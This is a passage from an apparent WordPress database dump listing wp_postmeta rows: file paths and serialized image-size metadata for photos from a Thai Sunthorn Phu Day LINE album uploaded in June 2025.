n\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4069,1461,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-1.jpg'),
(4070,1461,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-1.jpg\";s:8:\"filesize\";i:573635;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19693;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172504;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9476;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105183;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:329684;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_4-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25565;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4071,1462,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-1.jpg'),
(4072,1462,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-1.jpg\";s:8:\"filesize\";i:598366;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18803;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:172488;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9379;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103342;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:337489;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_2-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24041;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4073,1463,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1.jpg'),
(4074,1463,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1.jpg\";s:8:\"filesize\";i:600722;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19277;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177757;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9357;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107407;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:343335;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_5-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25306;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4075,1464,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-1.jpg'),
(4076,1464,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-1.jpg\";s:8:\"filesize\";i:560711;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19023;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168497;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8947;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:102693;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:322464;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_6-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25170;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4077,1465,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-1.jpg'),
(4078,1465,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-1.jpg\";s:8:\"filesize\";i:526262;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17678;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8136;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93856;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:299942;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_7-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23006;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4079,1466,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1.jpg'),
(4080,1467,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-2.jpg'),
(4081,1466,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1.jpg\";s:8:\"filesize\";i:515648;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17762;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151809;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8879;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92706;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:292932;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_9-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23151;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4082,1467,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:67:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-2.jpg\";s:8:\"filesize\";i:553738;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19865;}s:5:\"large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_8-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:168640;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9773;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103629;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_8-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:319168;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:67:\"LINE_ALBUM_วันสุนทรภู่_250626_8-2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25902;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4083,1468,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1.jpg'),
(4084,1468,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1.jpg\";s:8:\"filesize\";i:603023;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19806;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177704;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9537;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107463;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:343126;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_10-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25616;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4085,1469,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1.jpg'),
(4086,1469,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1.jpg\";s:8:\"filesize\";i:514692;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17175;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:149347;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8552;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:90331;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:290218;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_11-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22394;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4087,1470,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-2.jpg'),
(4088,1470,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-2.jpg\";s:8:\"filesize\";i:523642;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18677;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_12-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:155157;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9024;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:95036;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_12-2-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:298200;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_12-2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24102;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4089,1471,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1.jpg'),
(4090,1471,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1.jpg\";s:8:\"filesize\";i:541570;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19259;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162233;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9484;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99385;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:311600;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_13-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24889;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4091,1472,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1.jpg'),
(4092,1472,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1.jpg\";s:8:\"filesize\";i:564831;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17337;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:160357;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8161;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"fil